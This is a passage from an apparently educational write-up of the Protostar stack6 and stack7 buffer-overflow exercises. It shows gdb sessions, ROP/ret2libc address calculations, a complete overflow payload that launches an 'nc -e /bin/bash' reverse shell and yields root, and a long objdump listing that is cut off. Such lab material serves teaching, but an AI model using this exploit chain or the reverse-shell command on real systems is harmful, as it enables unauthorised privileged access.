span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span
span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack6 /span/span
span class="code-line"/span
span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack6/stack6.c:26/span/span
span class="code-line"span class="go"26  stack6/stack6.c: No such file or directory./span/span
span class="code-line"span class="go"    in stack6/stack6.c/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span
span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print execve/span/span
span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2e170 lt;__execvegt;/span
span class="code-line"/code/pre/div
/td/tr/table
pAs you can see, the address of setuid doesn't start with codebf/code so we can use this as our initial return address./p
pWe now want to address of our ROP gadget, this will just be responsible for cleaning up the stack after the call to setuid, so this time we want a codepop [register], ret/code sequence of instructions./p
pAgain we can use codeobjdump/code to find this, I won't post another dump of the binary but there are many of these sequencies we can use, I'll use the one at code0x80485a8/code./p
pWe can put our strings in to variables but this time, because we can insert null bytes (strong\0/strong), I will put the strings at the start of the payload./p
pThe number of bytes that the strings will occupy is:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spanspan class="nb"echo/span -n span class="s2"quot;/bin/bash -c nc -e /bin/bash 127.0.0.1 9000 quot;/span span class="p"|/span wc -c/span
span class="code-line"span class="go"44/span/span
span class="code-line"/code/pre/div
/td/tr/table
pWe know we have 80 bytes before we overwrite the return address, so we need code80-44 = 36/code bytes of padding after our strings./p
pSo here is how we want the stack to look after we overflow it:/p
pimg src="/assets/images/x86-32-linux/pseudo-stack.jpg" width="400"/p
pWe have all of these addresses except 11, 12, 14 and 15. Let's work these out now./p
pFirst 14 is just 10 bytes away from the start of our payload, and we already know the start of our payload is code0xbffff78c/code from the last exploit, so code0xbffff78c+0xa = 0xbffff796/code./p
p15 is just 3 bytes from 13 so code0xbffff796+0x3 = 0xbffff799/code./p
p11 is the start of our payload plus 80 bytes, then plus code8*4 = 32/code (there are 8 addresses before the argument list starts, each 4 bytes long), so code0xbffff78c+0x50+0x20 = 0xbffff7fc/code./p
p12 is just code3*4 = 12/code bytes away from 10 (because there are 3 4 byte addresses before the null pointer), so code0xbffff7fc+0xc = 0xbffff808/code./p
pSo with all of this information our stack should look like this:/p
pimg src="/assets/images/x86-32-linux/stack6-payload.jpg" width="400"/p
pObviously all of the addresses have to be put in in a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a format./p
pNow we can test this, first start our listener:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;/bin/bash\x00-c\x00nc -e /bin/bash 127.0.0.1 9000\x00quot; + quot;Aquot; * 36 + quot;\x80\xec\xf2\xb7quot; + quot;\xa8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\x70\xe1\xf2\xb7quot; + quot;JUNKquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\xfc\xf7\xff\xbfquot; + quot;\x08\xf8\xff\xbfquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\x96\xf7\xff\xbfquot; + quot;\x99\xf7\xff\xbfquot; + quot;\x00\x00\x00\x00quot;#39;/span span class="p"|/span ./stack6/span
span class="code-line"span class="go"input path please: got path /bin/bash/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span
span class="code-line"span class="go"/opt/protostar/bin/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSolved!/p
h2Stack7: The App/h2
pThis challenge is very similar to the previous 1 except the return address is not allowed to begin with codeb/code instead of codebf/code:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/span
span class="code-line"span class="normal"26/span/span
span class="code-line"span class="normal"27/span/span
span class="code-line"span class="normal"28/span/span
span class="code-line"span class="normal"29/span/span
span class="code-line"span class="normal"30/span/span
span class="code-line"span class="normal"31/span/span
span class="code-line"span class="normal"32/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;unistd.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span
span class="code-line"/span
span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="nf"getpath/spanspan class="p"()/spanspan class="w"/span/span
span class="code-line"span class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buffer/spanspan class="p"[/spanspan class="mi"64/spanspan class="p"];/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"ret/spanspan class="p";/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;input path please: quot;/spanspan class="p");/spanspan class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdout/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"gets/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"ret/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__builtin_return_address/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="k"if/spanspan class="p"((/spanspan class="n"ret/spanspan class="w" /spanspan class="o"amp;/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"    /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;bzzzt (%p)/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"ret/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"    /spanspan class="n"_exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="p"}/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;got path %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="k"return/spanspan class="w" /spanspan class="n"strdup/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="p"}/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span
span class="code-line"span class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="n"getpath/spanspan class="p"();/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"span class="p"}/spanspan class="w"/span/span
span class="code-line"/code/pre/div
/td/tr/table
h2Stack7: Exploitation/h2
pWe could use exactly the same method as the last 1 and just put a pointer to a coderet/code instruction before the call to codesetuid/code but I want to show a different way to do it./p
pI'm going to use codesystem/code instead of codeexecve/code and put my string into an environment variable./p
pFirst let's find the addresses of codesetuid/code and codesystem/code:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spangdb -q ./stack7/span
span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack7...done./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span
span class="code-line"span class="go"Dump of assembler code for function main:/span/span
span class="code-line"span class="go"0x08048545 lt;main+0gt;:    push   ebp/span/span
span class="code-line"span class="go"0x08048546 lt;main+1gt;:    mov    ebp,esp/span/span
span class="code-line"span class="go"0x08048548 lt;main+3gt;:    and    esp,0xfffffff0/span/span
span class="code-line"span class="go"0x0804854b lt;main+6gt;:    call   0x80484c4 lt;getpathgt;/span/span
span class="code-line"span class="go"0x08048550 lt;main+11gt;:   mov    esp,ebp/span/span
span class="code-line"span class="go"0x08048552 lt;main+13gt;:   pop    ebp/span/span
span class="code-line"span class="go"0x08048553 lt;main+14gt;:   ret    /span/span
span class="code-line"span class="go"End of assembler dump./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048545/span/span
span class="code-line"span class="go"Breakpoint 1 at 0x8048545: file stack7/stack7.c, line 27./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span
span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack7 /span/span
span class="code-line"/span
span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack7/stack7.c:27/span/span
span class="code-line"span class="go"27  stack7/stack7.c: No such file or directory./span/span
span class="code-line"span class="go"    in stack7/stack7.c/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span
span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print system/span/span
span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7ecffb0 lt;__libc_systemgt;/span
span class="code-line"/code/pre/div
/td/tr/table
pNow we need to find the addresses of our ROP gadgets, the first being just a coderet/code instruction and the second being a codepop [register], ret/code sequence to remove the argument to codesetuid/code before running codesystem/code, although these gadgets will be 1 byte away from each other:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"  1/span/span
span class="code-line"span class="normal"  2/span/span
span class="code-line"span class="normal"  3/span/span
span class="code-line"span class="normal"  4/span/span
span class="code-line"span class="normal"  5/span/span
span class="code-line"span class="normal"  6/span/span
span class="code-line"span class="normal"  7/span/span
span class="code-line"span class="normal"  8/span/span
span class="code-line"span class="normal"  9/span/span
span class="code-line"span class="normal" 10/span/span
span class="code-line"span class="normal" 11/span/span
span class="code-line"span class="normal" 12/span/span
span class="code-line"span class="normal" 13/span/span
span class="code-line"span class="normal" 14/span/span
span class="code-line"span class="normal" 15/span/span
span class="code-line"span class="normal" 16/span/span
span class="code-line"span class="normal" 17/span/span
span class="code-line"span class="normal" 18/span/span
span class="code-line"span class="normal" 19/span/span
span class="code-line"span class="normal" 20/span/span
span class="code-line"span class="normal" 21/span/span
span class="code-line"span class="normal" 22/span/span
span class="code-line"span class="normal" 23/span/span
span class="code-line"span class="normal" 24/span/span
span class="code-line"span class="normal" 25/span/span
span class="code-line"span class="normal" 26/span/span
span class="code-line"span class="normal" 27/span/span
span class="code-line"span class="normal" 28/span/span
span class="code-line"span class="normal" 29/span/span
span class="code-line"span class="normal" 30/span/span
span class="code-line"span class="normal" 31/span/span
span class="code-line"span class="normal" 32/span/span
span class="code-line"span class="normal" 33/span/span
span class="code-line"span class="normal" 34/span/span
span class="code-line"span class="normal" 35/span/span
span class="code-line"span class="normal" 36/span/span
span class="code-line"span class="normal" 37/span/span
span class="code-line"span class="normal" 38/span/span
span class="code-line"span class="normal" 39/span/span
span class="code-line"span class="normal" 40/span/span
span class="code-line"span class="normal" 41/span/span
span class="code-line"span class="normal" 42/span/span
span class="code-line"span class="normal" 43/span/span
span class="code-line"span class="normal" 44/span/span
span class="code-line"span class="normal" 45/span/span
span class="code-line"span class="normal" 46/span/span
span class="code-line"span class="normal" 47/span/span
span class="code-line"span class="normal" 48/span/span
span class="code-line"span class="normal" 49/span/span
span class="code-line"span class="normal" 50/span/span
span class="code-line"span class="normal" 51/span/span
span class="code-line"span class="normal" 52/span/span
span class="code-line"span class="normal" 53/span/span
span class="code-line"span class="normal" 54/span/span
span class="code-line"span class="normal" 55/span/span
span class="code-line"span class="normal" 56/span/span
span class="code-line"span class="normal" 57/span/span
span class="code-line"span class="normal" 58/span/span
span class="code-line"span class="normal" 59/span/span
span class="code-line"span class="normal" 60/span/span
span class="code-line"span class="normal" 61/span/span
span class="code-line"span class="normal" 62/span/span
span class="code-line"span class="normal" 63/span/span
span class="code-line"span class="normal" 64/span/span
span class="code-line"span class="normal" 65/span/span
span class="code-line"span class="normal" 66/span/span
span class="code-line"span class="normal" 67/span/span
span class="code-line"span class="normal" 68/span/span
span class="code-line"span class="normal" 69/span/span
span class="code-line"span class="normal" 70/span/span
span class="code-line"span class="normal" 71/span/span
span class="code-line"span class="normal" 72/span/span
span class="code-line"span class="normal" 73/span/span
span class="code-line"span class="normal" 74/span/span
span class="code-line"span class="normal" 75/span/span
span class="code-line"span class="normal" 76/span/span
span class="code-line"span class="normal" 77/span/span
span class="code-line"span class="normal" 78/span/span
span class="code-line"span class="normal" 79/span/span
span class="code-line"span class="normal" 80/span/span
span class="code-line"span class="normal" 81/span/span
span class="code-line"span class="normal" 82/span/span
span class="code-line"span class="normal" 83/span/span
span class="code-line"span class="normal" 84/span/span
span class="code-line"span class="normal" 85/span/span
span class="code-line"span class="normal" 86/span/span
span class="code-line"span class="normal" 87/span/span
span class="code-line"span class="normal" 88/span/span
span class="code-line"span class="normal" 89/span/span
span class="code-line"span class="normal" 90/span/span
span class="code-line"span class="normal" 91/span/span
span class="code-line"span class="normal" 92/span/span
span class="code-line"span class="normal" 93/span/span
span class="code-line"span class="normal" 94/span/span
span class="code-line"span class="normal" 95/span/span
span class="code-line"span class="normal" 96/span/span
span class="code-line"span class="normal" 97/span/span
span class="code-line"span class="normal" 98/span/span
span class="code-line"span class="normal" 99/span/span
span class="code-line"span class="normal"100/span/span
span class="code-line"span class="normal"101/span/span
span class="code-line"span class="normal"102/span/span
span class="code-line"span class="normal"103/span/span
span class="code-line"span class="normal"104/span/span
span class="code-line"span class="normal"105/span/span
span class="code-line"span class="normal"106/span/span
span class="code-line"span class="normal"107/span/span
span class="code-line"span class="normal"108/span/span
span class="code-line"span class="normal"109/span/span
span class="code-line"span class="normal"110/span/span
span class="code-line"span class="normal"111/span/span
span class="code-line"span class="normal"112/span/span
span class="code-line"span class="normal"113/span/span
span class="code-line"span class="normal"114/span/span
span class="code-line"span class="normal"115/span/span
span class="code-line"span class="normal"116/span/span
span class="code-line"span class="normal"117/span/span
span class="code-line"span class="normal"118/span/span
span class="code-line"span class="normal"119/span/span
span class="code-line"span class="normal"120/span/span
span class="code-line"span class="normal"121/span/span
span class="code-line"span class="normal"122/span/span
span class="code-line"span class="normal"123/span/span
span class="code-line"span class="normal"124/span/span
span class="code-line"span class="normal"125/span/span
span class="code-line"span class="normal"126/span/span
span class="code-line"span class="normal"127/span/span
span class="code-line"span class="normal"128/span/span
span class="code-line"span class="normal"129/span/span
span class="code-line"span class="normal"130/span/span
span class="code-line"span class="normal"131/span/span
span class="code-line"span class="normal"132/span/span
span class="code-line"span class="normal"133/span/span
span class="code-line"span class="normal"134/span/span
span class="code-line"span class="normal"135/span/span
span class="code-line"span class="normal"136/span/span
span class="code-line"span class="normal"137/span/span
span class="code-line"span class="normal"138/span/span
span class="code-line"span class="normal"139/span/span
span class="code-line"span class="normal"140/span/span
span class="code-line"span class="normal"141/span/span
span class="code-line"span class="normal"142/span/span
span class="code-line"span class="normal"143/span/span
span class="code-line"span class="normal"144/span/span
span class="code-line"span class="normal"145/span/span
span class="code-line"span class="normal"146/span/span
span class="code-line"span class="normal"147/span/span
span class="code-line"span class="normal"148/span/span
span class="code-line"span class="normal"149/span/span
span class="code-line"span class="normal"150/span/span
span class="code-line"span class="normal"151/span/span
span class="code-line"span class="normal"152/span/span
span class="code-line"span class="normal"153/span/span
span class="code-line"span class="normal"154/span/span
span class="code-line"span class="normal"155/span/span
span class="code-line"span class="normal"156/span/span
span class="code-line"span class="normal"157/span/span
span class="code-line"span class="normal"158/span/span
span class="code-line"span class="normal"159/span/span
span class="code-line"span class="normal"160/span/span
span class="code-line"span class="normal"161/span/span
span class="code-line"span class="normal"162/span/span
span class="code-line"span class="normal"163/span/span
span class="code-line"span class="normal"164/span/span
span class="code-line"span class="normal"165/span/span
span class="code-line"span class="normal"166/span/span
span class="code-line"span class="normal"167/span/span
span class="code-line"span class="normal"168/span/span
span class="code-line"span class="normal"169/span/span
span class="code-line"span class="normal"170/span/span
span class="code-line"span class="normal"171/span/span
span class="code-line"span class="normal"172/span/span
span class="code-line"span class="normal"173/span/span
span class="code-line"span class="normal"174/span/span
span class="code-line"span class="normal"175/span/span
span class="code-line"span class="normal"176/span/span
span class="code-line"span class="normal"177/span/span
span class="code-line"span class="normal"178/span/span
span class="code-line"span class="normal"179/span/span
span class="code-line"span class="normal"180/span/span
span class="code-line"span class="normal"181/span/span
span class="code-line"span class="normal"182/span/span
span class="code-line"span class="normal"183/span/span
span class="code-line"span class="normal"184/span/span
span class="code-line"span class="normal"185/span/span
span class="code-line"span class="normal"186/span/span
span class="code-line"span class="normal"187/span/span
span class="code-line"span class="normal"188/span/span
span class="code-line"span class="normal"189/span/span
span class="code-line"span class="normal"190/span/span
span class="code-line"span class="normal"191/span/span
span class="code-line"span class="normal"192/span/span
span class="code-line"span class="normal"193/span/span
span class="code-line"span class="normal"194/span/span
span class="code-line"span class="normal"195/span/span
span class="code-line"span class="normal"196/span/span
span class="code-line"span class="normal"197/span/span
span class="code-line"span class="normal"198/span/span
span class="code-line"span class="normal"199/span/span
span class="code-line"span class="normal"200/span/span
span class="code-line"span class="normal"201/span/span
span class="code-line"span class="normal"202/span/span
span class="code-line"span class="normal"203/span/span
span class="code-line"span class="normal"204/span/span
span class="code-line"span class="normal"205/span/span
span class="code-line"span class="normal"206/span/span
span class="code-line"span class="normal"207/span/span
span class="code-line"span class="normal"208/span/span
span class="code-line"span class="normal"209/span/span
span class="code-line"span class="normal"210/span/span
span class="code-line"span class="normal"211/span/span
span class="code-line"span class="normal"212/span/span
span class="code-line"span class="normal"213/span/span
span class="code-line"span class="normal"214/span/span
span class="code-line"span class="normal"215/span/span
span class="code-line"span class="normal"216/span/span
span class="code-line"span class="normal"217/span/span
span class="code-line"span class="normal"218/span/span
span class="code-line"span class="normal"219/span/span
span class="code-line"span class="normal"220/span/span
span class="code-line"span class="normal"221/span/span
span class="code-line"span class="normal"222/span/span
span class="code-line"span class="normal"223/span/span
span class="code-line"span class="normal"224/span/span
span class="code-line"span class="normal"225/span/span
span class="code-line"span class="normal"226/span/span
span class="code-line"span class="normal"227/span/span
span class="code-line"span class="normal"228/span/span
span class="code-line"span class="normal"229/span/span
span class="code-line"span class="normal"230/span/span
span class="code-line"span class="normal"231/span/span
span class="code-line"span class="normal"232/span/span
span class="code-line"span class="normal"233/span/span
span class="code-line"span class="normal"234/span/span
span class="code-line"span class="normal"235/span/span
span class="code-line"span class="normal"236/span/span
span class="code-line"span class="normal"237/span/span
span class="code-line"span class="normal"238/span/span
span class="code-line"span class="normal"239/span/span
span class="code-line"span class="normal"240/span/span
span class="code-line"span class="normal"241/span/span
span class="code-line"span class="normal"242/span/span
span class="code-line"span class="normal"243/span/span
span class="code-line"span class="normal"244/span/span
span class="code-line"span class="normal"245/span/span
span class="code-line"span class="normal"246/span/span
span class="code-line"span class="normal"247/span/span
span class="code-line"span class="normal"248/span/span
span class="code-line"span class="normal"249/span/span
span class="code-line"span class="normal"250/span/span
span class="code-line"span class="normal"251/span/span
span class="code-line"span class="normal"252/span/span
span class="code-line"span class="normal"253/span/span
span class="code-line"span class="normal"254/span/span
span class="code-line"span class="normal"255/span/span
span class="code-line"span class="normal"256/span/span
span class="code-line"span class="normal"257/span/span
span class="code-line"span class="normal"258/span/span
span class="code-line"span class="normal"259/span/span
span class="code-line"span class="normal"260/span/span
span class="code-line"span class="normal"261/span/span
span class="code-line"span class="normal"262/span/span
span class="code-line"span class="normal"263/span/span
span class="code-line"span class="normal"264/span/span
span class="code-line"span class="normal"265/span/span
span class="code-line"span class="normal"266/span/span
span class="code-line"span class="normal"267/span/span
span class="code-line"span class="normal"268/span/span
span class="code-line"span class="normal"269/span/span
span class="code-line"span class="normal"270/span/span
span class="code-line"span class="normal"271/span/span
span class="code-line"span class="normal"272/span/span
span class="code-line"span class="normal"273/span/span
span class="code-line"span class="normal"274/span/span
span class="code-line"span class="normal"275/span/span
span class="code-line"span class="normal"276/span/span
span class="code-line"span class="normal"277/span/span
span class="code-line"span class="normal"278/span/span
span class="code-line"span class="normal"279/span/span
span class="code-line"span class="normal"280/span/span
span class="code-line"span class="normal"281/span/span
span class="code-line"span class="normal"282/span/span
span class="code-line"span class="normal"283/span/span
span class="code-line"span class="normal"284/span/span
span class="code-line"span class="normal"285/span/span
span class="code-line"span class="normal"286/span/span
span class="code-line"span class="normal"287/span/span
span class="code-line"span class="normal"288/span/span
span class="code-line"span class="normal"289/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"[email protected]:/opt/protostar/bin$ objdump -d ./stack7 -M intel/span/span
span class="code-line"/span
span class="code-line"span class="nl"./stack7/spanspan class="p":/span     file format span class="s"elf32-i386/span/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048354/span span class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048354:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048355:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048357:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048358:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 804835b:   e8 00 00 00 00          call   8048360 lt;_init+0xcgt;/span/span
span class="code-line"span class="x" 8048360:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048361:   81 c3 dc 13 00 00       add    ebx,0x13dc/span/span
span class="code-line"span class="x" 8048367:   8b 93 fc ff ff ff       mov    edx,DWORD PTR [ebx-0x4]/span/span
span class="code-line"span class="x" 804836d:   85 d2                   test   edx,edx/span/span
span class="code-line"span class="x" 804836f:   74 05                   je     8048376 lt;_init+0x22gt;/span/span
span class="code-line"span class="x" 8048371:   e8 1e 00 00 00          call   8048394 lt;[email protected];/span/span
span class="code-line"span class="x" 8048376:   e8 25 01 00 00          call   80484a0 lt;frame_dummygt;/span/span
span class="code-line"span class="x" 804837b:   e8 50 02 00 00          call   80485d0 lt;__do_global_ctors_auxgt;/span/span
span class="code-line"span class="x" 8048380:   58                      pop    eax/span/span
span class="code-line"span class="x" 8048381:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048382:   c9                      leave  /span/span
span class="code-line"span class="x" 8048383:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048384/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048384:   ff 35 40 97 04 08       push   DWORD PTR ds:0x8049740/span/span
span class="code-line"span class="x" 804838a:   ff 25 44 97 04 08       jmp    DWORD PTR ds:0x8049744/span/span
span class="code-line"span class="x" 8048390:   00 00                   add    BYTE PTR [eax],al/span/span
span class="code-line"span class="x"    .../span/span
span class="code-line"/span
span class="code-line"span class="mh"08048394/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048394:   ff 25 48 97 04 08       jmp    DWORD PTR ds:0x8049748/span/span
span class="code-line"span class="x" 804839a:   68 00 00 00 00          push   0x0/span/span
span class="code-line"span class="x" 804839f:   e9 e0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483a4/span span class="p"lt;/spanspan class="nf"gets[email protected]/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483a4:   ff 25 4c 97 04 08       jmp    DWORD PTR ds:0x804974c/span/span
span class="code-line"span class="x" 80483aa:   68 08 00 00 00          push   0x8/span/span
span class="code-line"span class="x" 80483af:   e9 d0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483b4/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483b4:   ff 25 50 97 04 08       jmp    DWORD PTR ds:0x8049750/span/span
span class="code-line"span class="x" 80483ba:   68 10 00 00 00          push   0x10/span/span
span class="code-line"span class="x" 80483bf:   e9 c0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483c4/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483c4:   ff 25 54 97 04 08       jmp    DWORD PTR ds:0x8049754/span/span
span class="code-line"span class="x" 80483ca:   68 18 00 00 00          push   0x18/span/span
span class="code-line"span class="x" 80483cf:   e9 b0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483d4/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483d4:   ff 25 58 97 04 08       jmp    DWORD PTR ds:0x8049758/span/span
span class="code-line"span class="x" 80483da:   68 20 00 00 00          push   0x20/span/span
span class="code-line"span class="x" 80483df:   e9 a0 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483e4/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span
